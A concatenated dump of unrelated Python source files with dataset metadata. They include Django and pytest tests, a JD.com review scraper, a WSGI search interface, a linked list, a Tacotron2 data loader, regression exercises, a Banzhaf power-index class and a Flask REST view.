See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.core import urlresolvers\nfrom django import http\nimport mox\n\nfrom tuskar_ui import api as tuskar\nfrom tuskar_ui.test import helpers as test\n\n\nclass FlavorsTests(test.BaseAdminViewTests):\n\n @test.create_stubs({tuskar.Flavor: ('get',),\n tuskar.ResourceClass: ('get',)})\n def test_detail_flavor(self):\n flavor = self.tuskar_flavors.first()\n resource_class = self.tuskar_resource_classes.first()\n\n tuskar.ResourceClass.get(mox.IsA(http.HttpRequest),\n resource_class.id).AndReturn(resource_class)\n\n tuskar.Flavor.get(mox.IsA(http.HttpRequest),\n resource_class.id,\n flavor.id).AndReturn(flavor)\n\n self.mox.ReplayAll()\n\n url = urlresolvers.reverse('horizon:infrastructure:'\n 'resource_management:resource_classes:'\n 'flavors:detail',\n args=[resource_class.id, flavor.id])\n res = self.client.get(url)\n self.assertTemplateUsed(res,\n 'infrastructure/resource_management/'\n 'flavors/detail.html')\n\n @test.create_stubs({tuskar.Flavor: ('get',)})\n def test_detail_flavor_exception(self):\n flavor = self.tuskar_flavors.first()\n resource_class = self.tuskar_resource_classes.first()\n\n tuskar.Flavor.get(mox.IsA(http.HttpRequest),\n resource_class.id,\n flavor.id).AndRaise(self.exceptions.tuskar)\n\n self.mox.ReplayAll()\n\n url = urlresolvers.reverse('horizon:infrastructure:'\n 'resource_management:resource_classes:'\n 'flavors:detail',\n args=[resource_class.id, flavor.id])\n res = self.client.get(url)\n\n self.assertRedirectsNoFollow(res,\n urlresolvers.reverse('horizon:infrastructure:resource_management:'\n 'index'))\n","sub_path":"tuskar_ui/infrastructure/resource_management/flavors/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"602308226","text":"# -*- coding: utf-8 -*- \n# 找出一组字符串中最长的公共前缀: 先找出字符串中最小的字符串,然后把最小字符串中的字幕依次和剩余字符串进行比较。\n\n\ndef longestCommonPrefix(strs):\n if not strs:\n return ''\n \n first = min(strs)\n \n for i in range(len(first)):\n for s in strs:\n if first[i]!=s[i]:\n return first[:i]\n \n return first\n\n\nprint (longestCommonPrefix(['abc','ab','a']))","sub_path":"workspace/新建文件夹/Leetcode/review/最长公共前缀.py","file_name":"最长公共前缀.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"598845999","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\nrequests.packages.urllib3.disable_warnings()\nsession=requests.Session()\nsession.proxies={\n 'https':'http://125.70.13.77:8080',\n 'http':'http://125.70.13.77:8080'\n}\n\nurl='https://search.jd.com/Search?keyword=%E7%A9%BA%E6%B0%94%E5%87%80%E5%8C%96%E5%99%A8&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=kong%27qi%27jing%27hua%27qi&psort=3&stock=1&page=121&s=61&click=0'\n#商品界面url=1+2n\ndef get_goods_list_url(page):\n return 'https://search.jd.com/Search?keyword=%E7%A9%BA%E6%B0%94%E5%87%80%E5%8C%96%E5%99%A8&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=kong%27qi%27jing%27hua%27qi&psort=3&stock=1&page={}&s=61&click=0'.format(page)\n\n#评论url,source范围0--7\ndef get_comment_url(goods_id,source,page):\n return 'https://sclub.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98vv40121&productId={}&score={}&sortType=6&page={}&pageSize=10&isShadowSku=0&fold=1'.format(goods_id,source,page)\n\ndef get_goods_list_data(url):\n res = requests.get(url)\n res.encoding = 'utf-8'\n # 
print(res.text)\n soup = BeautifulSoup(res.text, 'lxml')\n goods_ul = soup.select('ul.gl-warp.clearfix')[0]\n for li in goods_ul.find_all('li'):\n id = li['data-sku']\n print('ID--------' + id)\n title = li.select('div.p-name.p-name-type-2 em')[0].text\n print('标题------' + title)\n price = li.select('div.p-price strong i')[0].text\n print('价格------' + price)\n comment_num = li.select('div.p-commit a[id^=J_comment]')[0].text\n print(\"评价------\" + comment_num)\n shop_name = li.select('div.p-shop a')[0].text\n print(\"店铺名----\" + shop_name)\n print('开始获取该商品评论.....')\n get_all_comments(id)\n print('评论抓取完成')\n # break\n\n#获取评论----一个url\ndef get_comments(url):\n comment_res=requests.get(url,verify=False)\n # comment_res.encoding='utf-8'\n comments_json=json.loads(comment_res.text[27:-2])['comments']\n if comments_json==[]:\n raise OverflowError\n return None\n # print(json.dumps(j,indent=4,separators=(',',':')))\n for comment in comments_json:\n print(comment['content'])\n\n#获取所有评论---遍历url\ndef get_all_comments(goods_id):\n for source in range(8):\n page = 0\n while True:\n try:\n get_comments(get_comment_url(goods_id,source, page))\n page += 1\n except OverflowError:\n break\n\n# get_all_comments(5487565)\n\nif __name__ == '__main__':\n for i in range(50):\n page=1+2*i\n get_goods_list_data(get_goods_list_url(page))\n break","sub_path":"myspiders/tidy/jd_data.py","file_name":"jd_data.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"90133552","text":"#!/usr/bin/env python3\nimport cgi\nimport pandas as pd\nimport ujson\nfrom articlix.search.search import Articlix\nfrom articlix.index.index import correct, get_tokens\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport urllib\nimport numpy as np\n\ndef get_tokens_(text, spellcheck):\n tokens = RegexpTokenizer(r'\\w+').tokenize(text)\n if spellcheck:\n tokens = [correct(token) for token in tokens]\n return tokens\n\n\nclass Interface:\n def __init__(self): \n print(\"Reading data ...\")\n df = pd.read_hdf('data/clean_articles2.h5')\n ix = ujson.load(open('data/index2.json', 'r'))\n self.ss = Articlix(df, ix, spellcheck=False)\n\n def check_query(self, q):\n inform_str = b''\n q_tokens = get_tokens_(q, False)\n correct_tokens = get_tokens_(q, True)\n need_to_inform = False\n for token, word, correct_token in zip(q_tokens, q.split(' '), correct_tokens):\n if token != correct_token:\n inform_str += b'<b>' + correct_token.encode('utf8') + b'</b> '\n need_to_inform = True\n else:\n inform_str += token.encode('utf8') + b' '\n return ' '.join(correct_tokens), inform_str\n\n def get_checked_query(self, arguments):\n if 'query' not in arguments:\n return b''\n corrected_query, cor_q_str = self.check_query(arguments['query'].value)\n topn = int(arguments['topn'].value)\n order = arguments['sort_by'].value\n query = arguments['query'].value\n import copy \n new_args = copy.deepcopy(arguments)\n is_better = list(self.ss.find(query, topn=topn, order=order, add_scores=True)['scores'])[0] < list(self.ss.find(corrected_query, topn=topn, order=order, add_scores=True)['scores'])[0]\n if is_better:\n s = b'Do you mean: '\n new_args['query'].value = ' '.join(get_tokens_(new_args['query'].value, True))\n s += b'<a href=\"http://127.0.0.1:8080/?' 
+ urllib.parse.urlencode({key: new_args[key].value for key in new_args}).encode(\"utf8\") + b'\">' + cor_q_str + b'</a>'\n s += b'?<br><br>'\n return s\n return b''\n\n def get_top_html(self, arguments):\n if 'query' in arguments:\n query = arguments['query'].value\n else:\n query = ''\n if 'priority' in arguments:\n prior = arguments['priority'].value\n else:\n prior = ''\n order = 'scores'\n if 'sort_by' in arguments:\n order = arguments['sort_by'].value\n topn = 5\n if 'topn' in arguments:\n topn = arguments['topn'].value\n return b'''\n <html>\n <head>\n <title>Hello Articlix!\n \n \n

[search page body lost to HTML stripping: Articlix banner, plus a form with a query box, an "about yourself" priority box, a sort-by selector, a top-n selector and a submit button]
\n '''\n def get_start_top_html(self, query=None, prior=None):\n return b'''\n \n \n Hello Articlix!\n \n \n

[start page body lost to HTML stripping: Articlix banner and an empty search form]
\n \n '''\n\n def get_bottom_html(self):\n return b'''\n
\n \n \n '''\n\n def refresh(self, environ, start_response):\n html = self.get_start_top_html() + self.get_bottom_html()\n\n arguments = cgi.FieldStorage(environ=environ)\n if len(arguments) > 0:\n html = self.get_top_html(arguments) + self.get_checked_query(arguments) + self.get_response_html(arguments) + self.get_bottom_html()\n\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [html]\n\n def get_response_html(self, arguments):\n query = ''\n prior = ''\n if 'query' in arguments:\n query = arguments['query'].value\n if 'priority' in arguments:\n prior = arguments['priority'].value\n\n if query == '' or prior == '':\n return self.get_response_to_empty(query == '', prior == '')\n self.ss.priors = prior\n html = b''\n result_list = []\n order = 'scores'\n if 'sort_by' in arguments:\n order = arguments['sort_by'].value\n topn = 5\n if 'topn' in arguments:\n topn = int(arguments['topn'].value)\n return self.create_table(query, self.ss.find(query, topn=topn, order=order))\n\n def get_article(self, q, doc_id, url, title, content):\n s = b'' + self.highlight_words(q, title, doc_id, is_title=True) + b''\n s += b''\n s += self.highlight_words(q, content, doc_id, False, get_description=True, window_size=200)\n return s\n\n def create_table(self, q, pd_table):\n s = b''\n s += b''\n for doc_id, row in pd_table.iterrows():\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b'
<tr><th>Results</th><th>Published date</th><th>Estimated time to read</th><th>Number of likes</th><th>Number of comments</th></tr>
' + self.get_article(q, doc_id, row['url'], row['title'], row['content']) + b'</td><td>' + str(pd.to_datetime(row['published_date']).date()).encode('utf8') + b'</td><td>' + str(row['estimate_time']).encode('utf8') + b'</td><td>' + str(row['likes']).encode('utf8') + b'</td><td>' + str(row['comments']).encode('utf8') + b'
</td></tr>'\n return s\n\n \n def get_response_to_empty(self, query_is_empty, prior_is_empty):\n s = b''\n if query_is_empty:\n s += b'Please fill query.<br>
'\n if prior_is_empty:\n s += b'Please fill info about yourself.<br>
'\n return s\n \n def highlight_words(self, query, text, doc_id, is_title, get_description=False, window_size=None):\n positions = []\n for i, q in get_tokens(query, False):\n for d, pos, is_t in self.ss.index.get(q, []):\n if d == doc_id and is_title == is_t:\n positions.append(pos)\n positions = np.array(positions) \n if len(positions) == 0:\n if get_description and window_size is not None:\n return text[:window_size].encode('utf8') + b'
<br>'\n return text.encode('utf8') + b'
<br>'\n\n if not get_description or window_size is None:\n window_size = len(text)\n i_from = 0\n else:\n window_size = min(window_size, len(text))\n i_from = positions[0]\n count = ((i_from < positions) & (positions < i_from + window_size)).sum()\n for i in positions:\n if i + window_size >= len(text):\n break\n c = ((i <= positions) & (positions < i + window_size)).sum()\n if count < c:\n count = c\n i_from = i\n s = b'...'\n i = i_from\n while i < i_from + window_size and i < len(text):\n if i not in positions:\n s += text[i].encode('utf8')\n i += 1\n else:\n s += b'<b>'\n while i < i_from + window_size and i < len(text) and text[i].isalpha():\n s += text[i].encode('utf8')\n i += 1\n s += b'</b>'\n s += b'<br>
'\n return s\n\n def run(self):\n try:\n from wsgiref.simple_server import make_server\n httpd = make_server('', 8080, self.refresh)\n print('Serving on http://127.0.0.1:8080...')\n httpd.serve_forever()\n except KeyboardInterrupt:\n print('Goodbye.')\n\n\n","sub_path":"articlix/web_interface/web_interface.py","file_name":"web_interface.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"400096972","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:bowen jiang\n\"\"\"\nimport requests\nimport pytest\n\nclass Test_presalePage_edit:\n \"\"\"\n 编辑售前页\n \"\"\"\n\n def test_presalePage_edit_success(self, Http_cl, data,new_presalePage):\n \"\"\"\n desc:编辑售前页成功\n steps:\n 1、创建新售前页\n 2、调编辑售前页接口成功\n 3、验证返回的状态码为200和返回参数正确\n \"\"\"\n presaleId = new_presalePage\n res = Http_cl.presalePage_edit(data.needCallback, data.addTeacherProcess, data.title,data.couponRef,\n data.firstLevelTitle, data.secondLevelTitle, data.adFeedType, data.headPicture,\n data.briefIntroPic1, data.briefIntroPic2, data.briefIntroPic3, data.briefIntroPic4,\n data.promotionText,data.promotionUnit, data.originalPrice, data.couponTitle,\n data.notBoughtText, data.boughtText, data.canNotBuyText,data.isDeleted,\n data.campRef, data.channel,presaleId=str(presaleId))\n assert res.data.id == presaleId\n\n","sub_path":"auto_api_project/xmkp-api-test/cases/OPS/LMS/trainingcamp/PresalePage/test_cases/test_presalePage_edit.py","file_name":"test_presalePage_edit.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"214279130","text":"class Nodo:\n def __init__(self, value, siguiente = None):\n self.data = value #Falta encapsulamiento\n self.siguiente = siguiente\n\nclass LinkedList:\n def __init__(self):\n self.__head = None\n\n def is_empty(self):\n return self.__head == None\n\n def append(self, value):\n nuevo = Nodo( value )\n if self.__head == None:\n self.__head = nuevo # self.is_empty()\n else:\n curr_node = self.__head\n while curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n curr_node.siguiente = nuevo\n\n def transversal(self):\n curr_node = self.__head\n while curr_node != None:\n print(f\"{curr_node.data} -->\", end = \"\")\n curr_node = curr_node.siguiente\n print(\" \")\n\n def remove(self, value):\n curr_node = self.__head\n if self.__head.data == value:\n self.__head = self.__head.siguiente\n else:\n anterior = None\n while curr_node.data != value and curr_node.siguiente != None:\n anterior = curr_node\n curr_node = curr_node.siguiente\n if curr_node.data == value:\n #print(\"ACTUAL:\", anterior.data)\n anterior.siguiente = curr_node.siguiente\n else:\n print(\"El dato no existe en la lista\")\n\n def preppend(self, value):\n nuevo = Nodo(value, self.__head)\n self.__head = nuevo\n\n def tail(self):\n curr_node = self.__head\n while curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n return curr_node\n\n def get(self, posicion = None): #Por defecto regresa el ultimo\n contador = 0\n dato = None\n if posicion == None:\n dato = self.tail().data\n else:\n #TAREA 6 --------------------------------------------------------------------------\n curr_node = self.__head\n while contador != posicion and curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n contador = contador + 1\n if contador == posicion: # Buscaremos por que se detubo el while.\n dato = curr_node.data\n else:\n dato = \"Rango fuera de la 
lista\"\n #TAREA 6 --------------------------------------------------------------------------\n return dato\n","sub_path":"Tarea 6/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619223431","text":"# *****************************************************************************\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the NVIDIA CORPORATION nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# *****************************************************************************\\\n\nimport torch\nimport tacotron2_common.layers as layers\nfrom tacotron2_common.utils import load_wav_to_torch, load_filepaths_and_text, to_gpu\n\n\nclass MelAudioLoader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) computes mel-spectrograms from audio files.\n \"\"\"\n\n def __init__(self, dataset_path, audiopaths_and_text, args):\n self.audiopaths_and_text = load_filepaths_and_text(dataset_path, audiopaths_and_text)\n self.max_wav_value = args.max_wav_value\n self.sampling_rate = args.sampling_rate\n self.stft = layers.TacotronSTFT(\n args.filter_length, args.hop_length, args.win_length,\n args.n_mel_channels, args.sampling_rate, args.mel_fmin,\n args.mel_fmax)\n self.segment_length = args.segment_length\n\n def get_mel_audio_pair(self, filename):\n audio, sampling_rate = load_wav_to_torch(filename)\n\n if sampling_rate != self.stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, self.stft.sampling_rate))\n\n # Take segment\n if audio.size(0) >= self.segment_length:\n max_audio_start = audio.size(0) - self.segment_length\n audio_start = torch.randint(0, max_audio_start + 1, size=(1,)).item()\n audio = audio[audio_start:audio_start+self.segment_length]\n else:\n audio = torch.nn.functional.pad(\n audio, (0, self.segment_length - audio.size(0)), 'constant').data\n\n audio = audio / self.max_wav_value\n audio_norm = audio.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = 
self.stft.mel_spectrogram(audio_norm)\n melspec = melspec.squeeze(0)\n\n return (melspec, audio, len(audio))\n\n def __getitem__(self, index):\n return self.get_mel_audio_pair(self.audiopaths_and_text[index][0])\n\n def __len__(self):\n return len(self.audiopaths_and_text)\n\n\ndef batch_to_gpu(batch):\n x, y, len_y = batch\n x = to_gpu(x).float()\n y = to_gpu(y).float()\n len_y = to_gpu(torch.sum(len_y))\n return ((x, y), y, len_y)\n","sub_path":"PyTorch/SpeechSynthesis/Tacotron2/waveglow/data_function.py","file_name":"data_function.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"338063905","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 13 12:29:22 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx =[[6],[8],[10],[14],[18]]\r\nprint(x[0])\r\ny = [[7], [9] , [13], [17.5],[18]]\r\n\r\n\r\nplt.figure()\r\nplt.title('Pizza price plotted against diameter')\r\nplt.xlabel('Diameter in inches')\r\nplt.plot(x,y,'m.')\r\nplt.axis([0,25,0,25])\r\nplt.grid(True)\r\nplt.show()\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel = LinearRegression()\r\n\r\nmodel.fit(x,y)\r\nprint('A 13\" pizza should cost: $%.2f ' %model.predict(13)[0])\r\n\r\n#print(model.predict(12))\r\n\r\nMSE=np.mean((15-model.predict(12)[0])**2)\r\nprint('Mean Squared Error %r' %(MSE))\r\n\r\n\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(\"Salary_Data.csv\")\r\n\r\nprint (df)\r\n\r\nx1 = df['Salary']\r\ny1 = df['YearsExperience']\r\n\r\n#print (x1)\r\n#print(y1)\r\n\r\nplt.figure()\r\nplt.title('Salary vs Experience')\r\nplt.ylabel('Salary')\r\nplt.xlabel('Years of experience')\r\nplt.plot(x1,y1,'m.')\r\n#plt.axis([0,25,0,25])\r\nplt.grid(True)\r\nplt.show()\r\n\r\n\r\nfrom sklearn.cross_validation import train_test_split\r\n\r\n\r\n#Y = df['Salary']\r\n#X = df['YearsExperience']\r\nX = df.iloc[:,:-1].values\r\nY = df.iloc[:,1].values\r\n\r\n\r\nX_train, X_test , y_train , y_test = train_test_split(X,Y,test_size=1/6,random_state =0)\r\nprint('y_test')\r\nprint(y_test)\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train,y_train)\r\n\r\ny_pred = regressor.predict(X_test)\r\n\r\nMSE = np.mean((y_test-y_pred)**2)\r\nprint(\"Mean Squared Error %r\" %(MSE))\r\n\r\nplt.scatter(X_train,y_train, color ='red')\r\nplt.plot(X_train,regressor.predict(X_train), color = 'blue')\r\nplt.title('Salary vs Experience (Training Set)')\r\nplt.xlabel('Years of Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\nplt.scatter(X_test,y_test, color ='red')\r\nplt.plot(X_test,regressor.predict(X_test), color = 'blue')\r\nplt.title('Salary vs Experience (Training Set)')\r\nplt.xlabel('Years of Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n","sub_path":"day3/winedecisitiontree.py","file_name":"winedecisitiontree.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"367906777","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# In[4]:\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport random\r\n\r\n\r\n# In[128]:\r\n\r\n\r\nclass Banzhaf0:\r\n \"\"\"\r\n A:邻接矩阵\r\n P:关系概率数组\r\n Prob:投票类型概率矩阵\r\n \"\"\"\r\n def __init__(self,A,P,Prob,m=5,Rdom = False):\r\n self.A = A\r\n self.P = P\r\n self.Prob = Prob\r\n self.Rdom = Rdom\r\n self.m = m\r\n self.A_star = 
self.float_change()\r\n self.control_point = self.control_find()\r\n\r\n \r\n \r\n def s12(self,x,A0):\r\n \"\"\"\r\n 班扎夫指数计算的前两步\r\n Args:\r\n x: 起始投票情况值\r\n A0: 股权矩阵\r\n Returns: \r\n 返回收敛投票状况,或相互转移的多个投票状况 \r\n \r\n \"\"\"\r\n A = A0\r\n P = self.P\r\n A = np.array(A)*np.array(P)\r\n x0 = x\r\n x1 = x\r\n count = 0\r\n re = []\r\n M = 100\r\n for m in range(M):\r\n count += 1\r\n x0 = x1\r\n x1 = A.dot(x1)\r\n for i,j in enumerate(x1):\r\n if j > 0:\r\n x1[i] = 1\r\n else:\r\n x1[i] = -1\r\n if list(x1) in np.array(re).tolist():\r\n flag = np.array(re).tolist().index(list(x1))\r\n break\r\n re = re + [x1] \r\n return re[flag:]\r\n \r\n def control_find(self):\r\n \"\"\"\r\n 找到源节点\r\n return:源节点编号\r\n \"\"\"\r\n A = self.A_star\r\n Arr = np.array(A)\r\n n = Arr.shape[0]\r\n start = []\r\n end = []\r\n for i in range(n):\r\n for j in range(n):\r\n if Arr[i,j] != 0 and i != j:\r\n start.append(i)\r\n end.append(j)\r\n re1 = []\r\n re2 = []\r\n re1 = self.source(start,end)\r\n re2 = self.main_cir(start,end)\r\n re = list(set(re1)|set(re2))\r\n # self.control_point = re\r\n return re\r\n\r\n def s_all(self,source,target,prob):\r\n \"\"\"\r\n 给出source公司对target公司的班扎夫指数值\r\n Args:\r\n source: 控股公司\r\n target: 被控股公司\r\n prob: 投票类型概率矩阵,长度为2^n的列表\r\n Returns: \r\n 返回source公司对target公司的班扎夫指数值 \r\n \"\"\"\r\n Rdom = self.Rdom\r\n A = self.A_star\r\n control_point = self.control_point\r\n P = self.P\r\n if len(P) < len(A):\r\n P1 = np.ones((len(A)-len(P),len(P)))\r\n P2 = np.ones((len(A),len(A)-len(P)))\r\n P = np.concatenate((np.concatenate((np.array(P),P1),axis=0),P2),axis=1).tolist()\r\n A = np.array(A) * np.array(P) \r\n A = A.T\r\n n = len(A)\r\n k = 2**len(control_point)\r\n re = 0\r\n if Rdom:\r\n y = list(range(k))\r\n i = random.sample(y)\r\n x0 = self.num2binary(i,n)\r\n x0 = np.array(x0)\r\n #print(f'x0:{x0}')\r\n x1 = self.s12(x0,A)\r\n #print(f'x1:{x1}{i}')\r\n for j in range(len(x1)):\r\n print(x1)\r\n if x0[source - 1] == x1[j][target - 1]:\r\n re += 1/len(x1) * prob[i]\r\n # print(f're:{re} x1:{len(x1)}')\r\n # print(f'rev:{re}')\r\n return 2*re - 1\r\n else:\r\n for i in range(k):\r\n x0 = self.num2binary(i,n)\r\n x0 = np.array(x0)\r\n # print(f'x0:{x0}')\r\n x1 = self.s12(x0,A)\r\n #print(f'x1:{x1}{i}')\r\n for j in range(len(x1)):\r\n # print(x1)\r\n if x0[source - 1] == x1[j][target - 1]:\r\n # print(prob[i])\r\n re += 1/len(x1) * prob[i]\r\n # print(f're:{re} x1:{len(x1)}')\r\n # print(f'rev:{re}')\r\n return 2*re - 1\r\n \r\n def source(self,start,left):\r\n re = []\r\n for i in start:\r\n if i not in left:\r\n re.append(i)\r\n return list(set(re))\r\n \r\n def main_cir(self,start,end):\r\n graph = {}\r\n visited = {}\r\n stack = []\r\n num = len(end)\r\n node_l = start\r\n node_r = end\r\n for i in range(num):\r\n n1 = node_l[i]\r\n n2 = node_r[i]\r\n if n1 not in graph:\r\n graph[n1] = [n2]\r\n elif n2 not in graph[n1]:\r\n graph[n1].append(n2)\r\n if n1 not in visited:\r\n visited[n1] = False\r\n if n2 not in visited:\r\n visited[n2] = False\r\n # print(graph)\r\n \r\n re = []\r\n for node in visited.keys():\r\n if not visited[node]:\r\n self.dfs(node, graph, visited, stack,re)\r\n return list(set(re))\r\n \r\n \r\n def dfs(self,node, graph, visited, stack,Circle_set):\r\n visited[node] = True\r\n stack.append(node)\r\n circle_list = []\r\n if node in graph:\r\n for n in graph[node]:\r\n if n not in stack:\r\n if not visited[n]:\r\n self.dfs(n, graph, visited, stack,Circle_set)\r\n else:\r\n index = stack.index(n)\r\n # print('Circle: ')\r\n for i in stack[index:]:\r\n 
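# a neighbour that is already on the DFS stack closes a cycle: every node from
# its stack position up to the current top lies on that cycle, so each one is
# recorded in Circle_set.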
Circle_set.append(i)\r\n # print(f'i:{i}')\r\n #print(f'n:{n}')\r\n circle_set = set(circle_list)\r\n stack.pop(-1) \r\n \r\n \r\n def num2binary(self,num,k): \r\n \"\"\"\r\n 生成第num种投票类型,如[0,0,0]\r\n Args:\r\n num: 表示第num种投票类型,范围为0-2^k-1,类型为整数\r\n k: 表示公司数目\r\n Returns: \r\n 返回一个0-1列表,代表生成的投票类型\r\n \"\"\"\r\n all_point = k\r\n control_point = self.control_point\r\n re = [-1] * len(control_point)\r\n result = [-1] * all_point\r\n i = 0\r\n while num != 0:\r\n re[-i-1] = num % 2\r\n if re[-i-1] == 0:\r\n re[-i-1] = -1\r\n num = num // 2\r\n i += 1\r\n result = np.array(result)\r\n #print(len(re))\r\n #print(len(control_point))\r\n result[control_point] = np.array(re)\r\n return list(result)\r\n \r\n def Banzhaf(self):\r\n \"\"\"\r\n 给出资本系中各个公司的班扎夫指数值\r\n Args:\r\n Returns: \r\n 以一个矩阵的形式给出资本系中各个公司的班扎夫指数值\r\n \"\"\"\r\n \r\n A = self.A\r\n P = self.P\r\n prob = self.Prob\r\n Rdom = self.Rdom\r\n \r\n n = len(A)\r\n \r\n s = np.zeros_like(A)\r\n A_star = self.float_change() \r\n control_point = self.control_find()\r\n prob1 = []\r\n for i in range(len(prob)):\r\n for j in range(2**(len(A)-n)):\r\n prob1.append(prob[i]/(2**(len(A)-n)))\r\n #print(A)\r\n # print(prob1)\r\n for i in range(n):\r\n for j in range(n):\r\n s[i,j] = self.s_all(i+1,j+1,prob1)\r\n return s\r\n \r\n \r\n \r\n def float_change(self):\r\n \"\"\"\r\n 处理缺失数据\r\n :return: 返回经过处理补全后的股权邻接矩阵\r\n \"\"\"\r\n m = self.m\r\n A = self.A\r\n A1 = np.array(A)\r\n stock = np.sum(A1,0)\r\n float_stock = 1 - stock\r\n float_stock = np.around(float_stock,decimals=3)\r\n #print(float_stock)\r\n find = False\r\n for i in range(len(stock)):\r\n #print(float_stock)\r\n if float_stock[i] > min(A1[:,i])+10**(-3):\r\n find = True\r\n break\r\n if find:\r\n A2 = np.zeros((m,len(stock)))\r\n for i in range(len(stock)):\r\n for j in range(m):\r\n A2[j,i] = float_stock[i] / m\r\n A3 = np.zeros((m+len(stock),m))\r\n for i in range(m):\r\n A3[len(stock)+j,j] = 1\r\n A4 = np.concatenate((np.concatenate((A1,A2),axis=0),A3),axis=1)\r\n return A4.tolist()\r\n return A1.tolist()\r\n\r\n\r\n\r\n\r\n","sub_path":"xuqingying/banzhaf_1.py","file_name":"banzhaf_1.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"96685929","text":"#!/usr/bin/python3\n\"\"\"\nA new view for State objects that handles all default RestFul API actions\n\"\"\"\n\nfrom flask import Flask, abort, make_response, jsonify, request\nfrom models import storage\nfrom api.v1.views import app_views\nfrom models.amenity import Amenity\n\n\n@app_views.route('/amenities', methods=['GET'], strict_slashes=False)\ndef get_amenities():\n \"\"\"retrieves the list of all Amenities objects with info about amenities\"\"\"\n amenities = []\n for amenity in storage.all(Amenity).values():\n amenities.append(amenity.to_dict())\n return jsonify(amenities)\n\n\n@app_views.route('/amenities/', methods=['GET'],\n strict_slashes=False)\ndef get_amenity_obj(amenity_id):\n \"\"\"get info about state obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity:\n return jsonify(amenity.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('/amenities/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_amenity_obj(amenity_id):\n \"\"\"delete amenity obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity:\n amenity.delete()\n storage.save()\n return jsonify({}), 200\n else:\n abort(404)\n\n\n@app_views.route('/amenities', methods=['POST'], strict_slashes=False)\ndef 
